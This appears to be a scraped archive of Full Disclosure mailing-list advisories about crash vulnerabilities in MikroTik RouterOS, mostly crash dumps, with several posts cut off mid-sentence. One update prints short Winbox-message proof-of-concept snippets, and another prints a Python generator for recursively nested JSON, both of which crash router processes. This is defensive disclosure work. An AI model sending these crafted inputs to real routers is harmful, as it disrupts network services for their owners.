2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65
77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00
2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70
77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: code: 0x7765a55b
2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7
d8

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.


Solution

[FD] Three vulnerabilities found in MikroTik's RouterOS

2020-08-29 Thread Q C

Advisory: three vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

1. NULL pointer dereference
The dot1x process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the dot1x
process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-14:51:29.47@0:
2020.06.04-14:51:29.47@0:
2020.06.04-14:51:29.81@0: /nova/bin/dot1x
2020.06.04-14:51:29.81@0: --- signal=11

2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202
2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0 ebp=0x7fc50f78
esp=0x7fc50f6c
2020.06.04-14:51:29.81@0: eax=0x ebx=0x776ad4ec ecx=0x
edx=0x08062e28
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: maps:
2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp  00:0c 1064
/nova/bin/dot1x
2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c
2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f c5
7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08
2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00 00
00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: code: 0x776a51e5
2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08
e8

This vulnerability was initially found in stable 6.46.3, and was fixed in
stable 6.47.

2. division by zero
The netwatch process suffers from a division-by-zero vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
netwatch process due to arithmetic exception.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.04-16:25:57.65@0: --- signal=8

2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246
2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x ebp=0x73f8
esp=0x73b0
2020.06.04-16:25:57.65@0: eax=0x ebx=0x08051020 ecx=0x
edx=0x
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: maps:
2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp  00:1a 14
/ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.04-16:25:57.65@0: 77f41000-77f76000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-16:25:57.65@0: 77f7a000-77f94000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-16:25:57.65@0: 77f95000-77fa4000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-16:25:57.65@0: 77fa5000-77ff1000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-16:25:57.65@0: 77ff7000-77ffe000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: stack: 0x8000 - 0x73b0
2020.06.04-16:25:57.65@0: d8 f4 ff 7f 80 f6 ff 7f 06 00 00 00 d0 f3 ff
7f 84 e5 04 08 0b 00 ff 08 e8 f3 ff 7f 06 00 00 00
2020.06.04-16:25:57.65@0: 20 10 05 08 e4 1a ff 77 f8 f3 ff 7f 22 2c fc
77 d8 f4 ff 7f 0b 00 ff 08 08 f4 ff 7f e4 1a ff 77
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: code: 0x804c6d7
2020.06.04-16:25:57.65@0: f7 f6 8b 53 30 39 c2 73 6e 42 89 53 30 83 ec
0c

This vulnerability was initially found in stable 6.46.2, and was fixed in
stable 6.47.

3. memory corruption
The wireless process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
wireless process due to invalid memory

[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-08-14 Thread Q C

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

1. NULL pointer dereference
The igmpproxy process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
igmpproxy process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: --- signal=11

2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8
esp=0x7fa9326c
2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b
edx=0x
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: maps:
2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
/ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9
7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9
7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: code: 0x8050a8d
2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c
0f

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.

2. reachable assertion failure
The ipsec process suffers from an assertion failure vulnerability. There is
a reachable assertion in the ipsec process. By sending a crafted packet, an
authenticated remote user can crash the ipsec process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: --- signal=6

2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450
esp=0x7f8fa448
2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291
edx=0x0006
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: maps:
2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
/ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp  00:0c 959
   /lib/libdl-0.9.33.2.so
2020.06.04-18:25:16.04@0: 774bb000-774d r-xp  00:1f 15
/ram/pckg/dhcp/lib/libudhcp.so
2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp  00:0c 956
   /lib/libssl.so.1.0.0
2020.06.04-18:25:16.04@0: 77528000-7753 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-18:25:16.04@0: 7758-7759d000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp  00:0c 954
   /lib/libcrypto.so.1.0.0
2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448
2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47
77 06 00 00 00 00 92 48 77 20 00 00 00

[FD] Three vulnerabilities found in MikroTik's RouterOS

2020-07-24 Thread Q C

Advisory: three vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

1. Memory corruption vulnerability
The diskd process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the diskd
process due to invalid memory access.

Against stable 6.44.3, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: /nova/bin/diskd
2020.06.04-14:18:22.55@0: --- signal=11

2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 ebp=0x7fd40b78
esp=0x7fd40b6c
2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec ecx=0x776d54ec
edx=0x20fe0010
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: maps:
2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp  00:0c 1131
/nova/bin/diskd
2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp  00:0c 996
   /lib/libuClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp  00:0c 992
   /lib/libgcc_s.so.1
2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp  00:0c 976
   /lib/libuc++.so
2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp  00:0c 982
   /lib/libubox.so
2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp  00:0c 978
   /lib/libumsg.so
2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp  00:0c 990
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c
2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b d4
7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20
2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c d4
7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: code: 0x776cd1db
2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff
75

This vulnerability was initially found in long-term 6.44.5, and has been
fixed in stable 6.47.

2. NULL pointer dereference vulnerability
The graphing process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
graphing process due to NULL
pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: /nova/bin/graphing
2020.06.04-15:12:41.47@0: --- signal=11

2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202
2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8 ebp=0x7fa8acd8
esp=0x7fa8acb0
2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c ecx=0x
edx=0x08061ce8
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: maps:
2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp  00:0c 1038
/nova/bin/graphing
2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-15:12:41.47@0: 7768a000-776a4000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-15:12:41.47@0: 776a5000-776b4000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-15:12:41.47@0: 776b5000-776bd000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-15:12:41.47@0: 776be000-7770a000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-15:12:41.47@0: 7770d000-77717000 r-xp  00:0c 961
   /lib/libm-0.9.33.2.so
2020.06.04-15:12:41.47@0: 7771c000-77723000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: stack: 0x7fa8b000 - 0x7fa8acb0
2020.06.04-15:12:41.47@0: e8 1c 06 08 b8 1d 06 08 00 00 00 00 01 00 00
00 0c ad a8 7f 5b 00 00 00 b8 98 05 08 b8 98 05 08
2020.06.04-15:12:41.47@0: f0 da 6b 77 0c ad a8 7f 28 ad a8 7f 3a bc 6b
77 b8 1c 06 08 0c ad a8 7f 05 00 00 00 a0 10 06 08
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: code: 0x80521e2
2020.06.04-15:12:41.47@0: ff 51 04 83 c4 18 6a 5c 53 e8 a0 9c ff ff 8b
56

This vulnerability was initially found in long-term 6.44.6, and has been
fixed in stable 6.47.

3. Stack exhaustion vulnerability
The net process suffers from a stack exhaustion vulnerability. By sending a
crafted packet to the net process, an authenticated remote user can trigger
a stack

[FD] Four vulnerabilities found in MikroTik's RouterOS

2020-07-07 Thread Q C

Advisory: four vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: through stable 6.47
Fixed Versions: stable 6.47
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

These four vulnerabilities were tested only against the MikroTik RouterOS
stable release tree when found.
Maybe other release trees also suffer from these vulnerabilities.

PS: The following three memory corruption vulnerabilities are different.

1. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By
sending a crafted packet,
an authenticated remote user can crash the lcdstat process due to NULL
pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: /nova/bin/lcdstat
2020.06.04-15:32:04.67@0: --- signal=11

2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202
2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc ebp=0x7fbeae18
esp=0x7fbeadf4
2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848 ecx=0x0807f14c
edx=0x0001
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: maps:
2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp  00:0c 1054
/nova/bin/lcdstat
2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0: 77736000-7775 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-15:32:04.67@0: 77751000-7776 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4
2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 07
08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f
2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8 be
7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: code: 0x805a26e
2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 83
c4

2. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By
sending a crafted packet,
an authenticated remote user can crash the lcdstat process due to NULL
pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: /nova/bin/lcdstat
2020.06.04-15:48:13.77@0: --- signal=11

2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246
2020.06.04-15:48:13.77@0: edi=0xff00 esi=0x00ff ebp=0x7fd8cb48
esp=0x7fd8cb2c
2020.06.04-15:48:13.77@0: eax=0x ebx=0x ecx=0x
edx=0x
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: maps:
2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp  00:0c 1054
/nova/bin/lcdstat
2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-15:48:13.77@0: 77712000-77721000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-15:48:13.77@0: 77722000-7772a000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-15:48:13.77@0: 7772b000-7000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-15:48:13.77@0: d000-77784000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: stack: 0x7fd8d000 - 0x7fd8cb2c
2020.06.04-15:48:13.77@0: 00 00 00 00 00 00 00 01 80 c1 77 77 01 00 00
00 38 d4 d8 7f 50 5f 08 08 a8 5c 08 08 78 cb d8 7f
2020.06.04-15:48:13.77@0: 79 a2 05 08 78 36 08 08 00 00 00 00 00 de 77
77 8f cf d8 7f ff ff ff ff a8 5d 08 08 00 36 08 08
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: code: 0x80562c6
2020.06.04-15:48:13.77@0: 88 1c 02 89 f3 88 5c 02 01 89 fb 88 5c 02 02
05

3. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By
sending a crafted packet,
an authenticated

[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-05-12 Thread Q C

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: until stable 6.45.7 (first vulnerability), until stable
6.46.4 (second vulnerability)
Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
vulnerability)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
stable release tree when found. Maybe other release trees also suffer from
these vulnerabilities.

1. The cerm process suffers from an uncontrolled resource consumption
issue. By sending a crafted packet, an authenticated remote user can cause
a high cpu load, which may make the device respond slowly or unable to
respond.

2. The traceroute process suffers from a memory corruption issue. By
sending a crafted packet, an authenticated remote user can crash the
traceroute process due to invalid memory access.


Solution


Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/stable-release-tree

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2020-04-14 Thread Q C

[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
from these two vulnerabilities.

Details
===

Product: MikroTik's RouterOS
Affected Versions: through 6.46.5 (stable release tree)
Fixed Versions: -
Vendor URL: https://mikrotik.com/
Vendor Status: not fix yet
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Poc
===
The following pocs are based on the tool routeros (
https://github.com/tenable/routeros)

1) memory corruption in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe000c, -1);
msg.add_u32(9, 9);

2) assertion failure in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe0001, 0);

Disclosure timeline
===
2019/08/23reported the 2nd issue to the vendor
2019/08/26reported the 1st issue to the vendor
2019/08/28vendor reproduced the 1st issue and will fix it as soon as
possible
2019/08/30vendor reproduced the 2nd issue and will fix it as soon as
possible
2019/12/02notified the vendor the 1st issue still exists in version
6.44.6 (2nd issue fixed)
2020/01/06no response from the vendor, and did the initial disclosure
2020/04/14re-tested these two issues against the stable 6.46.5, and
updated the disclosure



Q C  于2020年1月6日周一 下午7:32写道：

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: before 6.44.6 (Long-term release tree)
> Fixed Versions: 6.44.6 (Long-term release tree)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> long-term release tree when found. Maybe other release trees also suffer
> from these issues.
>
> 1. The console process suffers from a memory corruption issue.
> An authenticated remote user can crash the console process due to a NULL
> pointer reference by sending a crafted packet.
>
> 2. The console process suffers from an assertion failure issue. There is a
> reachable assertion in the console process. An authenticated remote user
> can crash the console process duo to assertion failure by sending a crafted
> packet.
>
> Solution
> 
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-01-07 Thread Q C

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.6 (Long-term release tree)
Fixed Versions: 6.44.6 (Long-term release tree)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
long-term release tree when found. Maybe other release trees also suffer
from these issues.

1. The console process suffers from a memory corruption issue.
An authenticated remote user can crash the console process due to a NULL
pointer reference by sending a crafted packet.

2. The console process suffers from an assertion failure issue. There is a
reachable assertion in the console process. An authenticated remote user
can crash the console process duo to assertion failure by sending a crafted
packet.

Solution


Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Two vulnerabilities found in MikroTik's RouterOS

2019-07-23 Thread Q C

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.5 (Long-term release tree),
   before 6.45.1 (Stable release tree)
Fixed Versions: 6.44.5 (Long-term release tree),
6.45.1 (Stable release tree)
Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree
Vendor Status: fixed version released
CVE: CVE-2019-13954, CVE-2019-13955
Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Details of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
6.42.11 and 6.43.16 (Long-term release tree) when found.


1. CVE-2019-13954: memory exhaustion via a crafted POST request
This vulnerability is similiar to the CVE-2018-1157. An authenticated user
can cause the www binary to consume all memory via a crafted POST request
to /jsproxy/upload. It's because of the incomplete fix for the
CVE-2018-1157.

Based on the poc for cve_2018_1157 provided by the @Jacob Baines (really
appreciate!), crafting a filename ending with many '\x00' can bypass the
original fix to trigger the vulnerability.


2. CVE-2019-13955: stack exhaustion via recuring parsing of JSON
This vulnerability is similar to the CVE-2018-1158. An authenticated user
communicating with the www binary can trigger a stack exhaustion
vulnerability via recursive parsing of JSON containing message type M.

Based on the poc for cve_2018_1158 provided by the @Jacob Baines (really
appreciate!), crafting an JSON message with type M can trigger the
vulnerability. A simple python script to generate the crafted message is as
follows.

msg = "{M01:[M01:[]]}"
for _ in xrange(2000):
msg = msg.replace('[]', "[M01:[]]")


Solution


Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1
(Stable release tree).


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[2] https://github.com/tenable/routeros

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

[FD] Three vulnerabilities found in MikroTik's RouterOS

[FD] Four vulnerabilities found in MikroTik's RouterOS

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

[FD] Four vulnerabilities found in MikroTik's RouterOS

Re: [FD] Four vulnerabilities found in MikroTik's RouterOS

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

[FD] Two vulnerabilities found in MikroTik's RouterOS

[FD] Three vulnerabilities found in MikroTik's RouterOS

[FD] Two vulnerabilities found in MikroTik's RouterOS

[FD] Three vulnerabilities found in MikroTik's RouterOS

